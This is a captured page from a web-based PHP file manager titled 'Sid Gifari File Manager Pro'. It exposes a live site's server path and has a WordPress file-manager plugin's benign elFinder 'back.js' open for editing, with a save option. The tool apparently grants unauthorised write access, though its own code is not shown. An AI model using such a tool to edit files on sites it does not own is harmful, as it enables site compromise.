🔐 Sid Gifari File Manager Pro
v8.0.5 | 2026-06-18 10:19:37 | PHP 8.1.34
📂
/ (Root)
/
home
/
therahul
/
test2.therahuldas.com
/
wp-content
/
plugins
/
wp-file-manager
/
lib
/
js
/
commands
📍 /home/therahul/test2.therahuldas.com/wp-content/plugins/wp-file-manager/lib/js/commands
🔄 Refresh
✏️
Editing: back.js
Writable
/** * @class elFinder command "back" * Open last visited folder * * @author Dmitry (dio) Levashov **/ (elFinder.prototype.commands.back = function() { "use strict"; this.alwaysEnabled = true; this.updateOnSelect = false; this.shortcuts = [{ pattern : 'ctrl+left backspace' }]; this.getstate = function() { return this.fm.history.canBack() ? 0 : -1; }; this.exec = function() { return this.fm.history.back(); }; }).prototype = { forceLoad : true }; // this is required command
💾 Save Changes
❌ Cancel